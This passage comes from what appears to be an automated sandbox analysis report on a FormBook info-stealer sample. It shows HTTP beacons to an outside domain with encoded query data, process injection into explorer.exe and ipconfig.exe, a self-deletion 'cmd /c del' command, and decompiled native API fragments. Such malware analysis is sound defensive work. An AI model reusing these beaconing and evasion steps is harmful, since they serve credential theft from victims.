                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  6192.168.2.64975345.130.231.5680C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Jun 15, 2021 14:03:00.255693913 CEST6594OUTGET /eo5u/?3flLi=3fixF&WDH4Z=Ezm+JrLE+5pPue5ylk02zCcbBRDxpUQd/NZmTpADB2YZ+yT8iWaX2PHRJKXZOqAmups63MS7lw== HTTP/1.1
                                                                                                  Host: www.mirwanonline.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Jun 15, 2021 14:03:00.464818001 CEST6595INHTTP/1.1 301 Moved Permanently
                                                                                                  Connection: close
                                                                                                  content-type: text/html
                                                                                                  content-length: 707
                                                                                                  date: Tue, 15 Jun 2021 12:03:00 GMT
                                                                                                  server: LiteSpeed
                                                                                                  location: https://www.mirwanonline.com/eo5u/?3flLi=3fixF&WDH4Z=Ezm+JrLE+5pPue5ylk02zCcbBRDxpUQd/NZmTpADB2YZ+yT8iWaX2PHRJKXZOqAmups63MS7lw==
                                                                                                  vary: User-Agent
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                  Code Manipulations

                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  Analysis Process: ekeson and sons.exe PID: 6908 Parent PID: 5988

                                                                                                  General

                                                                                                  Start time:14:00:55
                                                                                                  Start date:15/06/2021
                                                                                                  Path:C:\Users\user\Desktop\ekeson and sons.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user\Desktop\ekeson and sons.exe'
                                                                                                  Imagebase:0x400000
                                                                                                  File size:206434 bytes
                                                                                                  MD5 hash:3E961220355D19E5E1272FD963F4A3D7
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: ekeson and sons.exe PID: 6948 Parent PID: 6908

                                                                                                  General

                                                                                                  Start time:14:00:56
                                                                                                  Start date:15/06/2021
                                                                                                  Path:C:\Users\user\Desktop\ekeson and sons.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user\Desktop\ekeson and sons.exe'
                                                                                                  Imagebase:0x400000
                                                                                                  File size:206434 bytes
                                                                                                  MD5 hash:3E961220355D19E5E1272FD963F4A3D7
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.429964840.00000000004F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.429964840.00000000004F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.429964840.00000000004F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.430341616.0000000000A20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.430341616.0000000000A20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.430341616.0000000000A20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:low

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: explorer.exe PID: 3440 Parent PID: 6948

                                                                                                  General

                                                                                                  Start time:14:01:10
                                                                                                  Start date:15/06/2021
                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                  Imagebase:0x7ff6f22f0000
                                                                                                  File size:3933184 bytes
                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: ipconfig.exe PID: 6328 Parent PID: 3440

                                                                                                  General

                                                                                                  Start time:14:01:39
                                                                                                  Start date:15/06/2021
                                                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                  Imagebase:0x940000
                                                                                                  File size:29184 bytes
                                                                                                  MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.597291175.0000000000A90000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.597291175.0000000000A90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.597291175.0000000000A90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:moderate

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: cmd.exe PID: 6680 Parent PID: 6328

                                                                                                  General

                                                                                                  Start time:14:01:43
                                                                                                  Start date:15/06/2021
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:/c del 'C:\Users\user\Desktop\ekeson and sons.exe'
                                                                                                  Imagebase:0x2a0000
                                                                                                  File size:232960 bytes
                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: conhost.exe PID: 6676 Parent PID: 6680

                                                                                                  General

                                                                                                  Start time:14:01:44
                                                                                                  Start date:15/06/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff61de10000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Chronological Activities

                                                                                                  Disassembly

                                                                                                  Code Analysis

                                                                                                  Reset < >

                                                                                                    Analysis Process: ekeson and sons.exe PID: 6948 Parent PID: 6908 ekeson and sons.exeCOMMON

                                                                                                    Executed Functions

                                                                                                    Function 00448270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 37%
                                                                                                    			E00448270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t3 = _a4 + 0xc48; // 0xc48
				_t28 = _t3;
				E00448DC0(_t27, _a4, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x443d52
				_t12 =  &_a8; // 0x443d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                                    0x0044827f
                                                                                                    0x0044827f
                                                                                                    0x00448287
                                                                                                    0x00448292
                                                                                                    0x004482ad
                                                                                                    0x004482b5
                                                                                                    0x004482b9

                                                                                                    APIs
                                                                                                    • NtReadFile.NTDLL(R=D,5E972F59,FFFFFFFF,00443A11,?,?,R=D,?,00443A11,FFFFFFFF,5E972F59,00443D52,?,00000000), ref: 004482B5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID: R=D$R=D
                                                                                                    • API String ID: 2738559852-1736491674
                                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                    • Instruction ID: 1eb081f20a5ef2495ec6acb5e095ba45c6ea41154240898ed5c7f06a35db8e6d
                                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                    • Instruction Fuzzy Hash: 7AF0A4B2200208ABDB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8118BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0044826A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35filenativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • NtReadFile.NTDLL(R=D,5E972F59,FFFFFFFF,00443A11,?,?,R=D,?,00443A11,FFFFFFFF,5E972F59,00443D52,?,00000000), ref: 004482B5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID: R=D$R=D
                                                                                                    • API String ID: 2738559852-1736491674
                                                                                                    • Opcode ID: 686b7813f248a1b9c8589cf9732063fa5e0b426c1316a9fb3c28737ea2aacb5a
                                                                                                    • Instruction ID: e063ef582d6ef59a96038cdd00bb21ab24a82ae7561db4064d40c97ae36f47c8
                                                                                                    • Opcode Fuzzy Hash: 686b7813f248a1b9c8589cf9732063fa5e0b426c1316a9fb3c28737ea2aacb5a
                                                                                                    • Instruction Fuzzy Hash: 33F01DB6200045ABDB08DF98C880CEB77ADEF8C314B19864DFD1CA7205CA34E815CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00448212, Relevance: 1.6, APIs: 1, Instructions: 57filenativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • NtCreateFile.NTDLL(00000060,00438AF3,?,00443B97,00438AF3,FFFFFFFF,?,?,FFFFFFFF,00438AF3,00443B97,?,00438AF3,00000060,00000000,00000000), ref: 0044820D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 3c2be1d8675e717ea5d71dd4d82fccb3be51529651a73d839ba7fbc98f0eb189
                                                                                                    • Instruction ID: 5b90e3df501b81ffa2fb6c6ff235cd80726919dd6d4fc9f3fa5c98a5e0be5854
                                                                                                    • Opcode Fuzzy Hash: 3c2be1d8675e717ea5d71dd4d82fccb3be51529651a73d839ba7fbc98f0eb189
                                                                                                    • Instruction Fuzzy Hash: 650102B2200108ABDB18DF98DC80EEB73A9EF8C714F05864DFA1CA7241C630EC118BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004481BA, Relevance: 1.6, APIs: 1, Instructions: 56filenativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • NtCreateFile.NTDLL(00000060,00438AF3,?,00443B97,00438AF3,FFFFFFFF,?,?,FFFFFFFF,00438AF3,00443B97,?,00438AF3,00000060,00000000,00000000), ref: 0044820D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: afea1b1dad327eb9e7417540a1d5f3f393cddc00f3acb40730e6ff962be31e59
                                                                                                    • Instruction ID: 391dbcdfb84e8d3dda1f496f78dfec5f4072a409235be9571c3d635c1db33379
                                                                                                    • Opcode Fuzzy Hash: afea1b1dad327eb9e7417540a1d5f3f393cddc00f3acb40730e6ff962be31e59
                                                                                                    • Instruction Fuzzy Hash: B411B0B2204209ABDB18DF98DC95DEB77ADEF8C754B148649FA5C97241CA30E8118BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004481C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • NtCreateFile.NTDLL(00000060,00438AF3,?,00443B97,00438AF3,FFFFFFFF,?,?,FFFFFFFF,00438AF3,00443B97,?,00438AF3,00000060,00000000,00000000), ref: 0044820D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                    • Instruction ID: a76d80ca4fa4334500de91898b3ea4766c15bbec8b03f5c3b5505b24a14f480f
                                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                    • Instruction Fuzzy Hash: 0BF0B6B2201108ABCB08DF89DC85DEB77ADAF8C754F158248FA0D97241C630E8118BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0044839C, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0044839C(void* __eax, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t15;
				void* _t22;

				_t11 = _v0;
				_t3 = _t11 + 0xc60; // 0xca0
				E00448DC0(_t22, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t15;
			}






                                                                                                    0x004483a3
                                                                                                    0x004483af
                                                                                                    0x004483b7
                                                                                                    0x004483d9
                                                                                                    0x004483dd

                                                                                                    APIs
                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00448F94,?,00000000,?,00003000,00000040,00000000,00000000,00438AF3), ref: 004483D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2167126740-0
                                                                                                    • Opcode ID: d90d93ae83ded448fa24d546f8c879ddc8513a50472b1b8a6823eb26557cc2d6
                                                                                                    • Instruction ID: 7e192142976257d25782274f380626ab78907194eef0f8fd8e1aaa06ec175635
                                                                                                    • Opcode Fuzzy Hash: d90d93ae83ded448fa24d546f8c879ddc8513a50472b1b8a6823eb26557cc2d6
                                                                                                    • Instruction Fuzzy Hash: ADF015B6200108AFDB14DF89CC80EEB77ADAF9C354F118649FA0DE7281C630E811CBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004483A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E004483A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00448DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                    0x004483af
                                                                                                    0x004483b7
                                                                                                    0x004483d9
                                                                                                    0x004483dd

                                                                                                    APIs
                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00448F94,?,00000000,?,00003000,00000040,00000000,00000000,00438AF3), ref: 004483D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2167126740-0
                                                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                    • Instruction ID: 52fae6242d8a5789bdaf93827ed81e9d111b54a3cf13177c4a1d247ddd54b7ec
                                                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                    • Instruction Fuzzy Hash: BCF015B2200208ABDB14DF89CC81EAB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004482F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E004482F0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x439743
				E00448DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                                    0x004482f3
                                                                                                    0x004482f6
                                                                                                    0x004482ff
                                                                                                    0x00448307
                                                                                                    0x00448315
                                                                                                    0x00448319

                                                                                                    APIs
                                                                                                    • NtClose.NTDLL(00443D30,?,?,00443D30,00438AF3,FFFFFFFF), ref: 00448315
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 3535843008-0
                                                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                    • Instruction ID: 1bfb0270237fc84097bae5219259ce8870961df72f30da52e1680933bf4ce975
                                                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                    • Instruction Fuzzy Hash: ACD012756002146BD710EF99CC45E97775CEF44750F154459BA185B242C930F90086E0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 87374a680de43f512c16b3e2e19905497ccd0422db6d86380cdeb3fb7cea66dd
                                                                                                    • Instruction ID: f3fdf611454ddee9560d5a86adf6a2149ff6160644ef850def56668f56fd361e
                                                                                                    • Opcode Fuzzy Hash: 87374a680de43f512c16b3e2e19905497ccd0422db6d86380cdeb3fb7cea66dd
